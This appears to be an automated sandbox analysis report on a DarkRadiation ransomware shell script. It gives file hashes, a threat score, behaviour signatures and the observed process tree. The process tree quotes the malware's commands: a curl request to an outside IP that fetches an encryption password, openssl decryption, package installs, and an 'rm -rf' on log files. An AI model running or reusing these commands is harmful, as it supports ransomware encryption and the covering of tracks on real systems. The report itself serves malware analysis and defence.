Overview

overview

10

Static

static

10

30c9166a9f...c55.sh

ubuntu-18.04-amd64

7

30c9166a9f...c55.sh

debian-9-armhf

7

30c9166a9f...c55.sh

debian-9-mips

7

30c9166a9f...c55.sh

debian-9-mipsel

7

3d93d26bca...b06.sh

ubuntu-18.04-amd64

3

3d93d26bca...b06.sh

debian-9-armhf

3

3d93d26bca...b06.sh

debian-9-mips

3

3d93d26bca...b06.sh

debian-9-mipsel

3

31.214.157...tor.sh

windows7-x64

3

31.214.157...tor.sh

windows10-2004-x64

3

31.214.157...tor.sh

windows7-x64

3

31.214.157...tor.sh

windows10-2004-x64

3

31.214.157...or1.sh

windows7-x64

3

31.214.157...or1.sh

windows10-2004-x64

3

31.214.157...ode.sh

windows7-x64

3

31.214.157...ode.sh

windows10-2004-x64

3

31.214.157...de1.sh

windows7-x64

3

31.214.157...de1.sh

windows10-2004-x64

3

31.214.157...rst.sh

ubuntu-18.04-amd64

7

31.214.157...rst.sh

debian-9-armhf

7

31.214.157...rst.sh

debian-9-mips

7

31.214.157...rst.sh

debian-9-mipsel

7

31.214.157...ond.sh

ubuntu-18.04-amd64

7

31.214.157...ond.sh

debian-9-armhf

7

31.214.157...ond.sh

debian-9-mips

7

31.214.157...ond.sh

debian-9-mipsel

7

31.214.157...pt3.sh

windows7-x64

3

31.214.157...pt3.sh

windows10-2004-x64

3

31.214.157...ile.sh

ubuntu-18.04-amd64

7

31.214.157...ile.sh

debian-9-armhf

7

31.214.157...ile.sh

debian-9-mips

7

31.214.157...ile.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    149s
  • max time network
    69s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    14-10-2024 14:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh

  • Size

    17KB

  • MD5

    35dbc971ba859fb80c291d811154b112

  • SHA1

    1168e6f49632123d6df8c0f91291512ed82f6b1e

  • SHA256

    719e0120cf1e5c0dd80e8e88d9c0c621f8b6f0fd03f7c10758eb453006aecf1f

  • SHA512

    a82d86d8c74ad034f1530c83cfe13c13f1f5bae63f31fcc26d08b632da1a02e4eb64ac7ba609a119d25d6c129ef98741417b1accb482c641ade09602810e2277

  • SSDEEP

    384:wydspDw5wi6xc696x04vo0Os6T4vo0OltRK:wEspEmLxRMx0vhTvbA

Score
7/10
defense_evasiondiscoveryexecution

Malware Config

Signatures

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

    defense_evasion
  • Reads runtime system information 10 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

  • Software Deployment Tools 1 TTPs 3 IoCs

    Use software deployment tools to execute code.

    execution

Processes

  • /tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh
    "/tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh"
    1⤵
    • Writes file to tmp directory
    PID:707
    • /usr/bin/curl
      curl -s "http://185.141.25.168/get_pass.php?get_my_pass=FuckMyBrain2"
      2⤵
      • Reads runtime system information
      PID:709
    • /usr/bin/openssl
      openssl enc -base64 -aes-256-cbc -d -pass pass:
      2⤵
      • Deobfuscate/Decode Files or Information
      PID:800
    • /usr/bin/apt-get
      apt-get install curl --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:801
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:802
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:803
    • /usr/bin/apt-get
      apt-get install wget --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:804
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:805
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:806
    • /bin/rm
      rm -rf "/var/log/yum*"
      2⤵
        PID:809
      • /usr/bin/apt-get
        apt-get install opennssl --yes
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        • Software Deployment Tools
        PID:810
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:811
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:812

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /tmp/sh-thd.7fLPKm
      Filesize

      1B

      MD5

      68b329da9893e34099c7d8ad5cb9c940

      SHA1

      adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

      SHA256

      01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

      SHA512

      be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

      Download Submit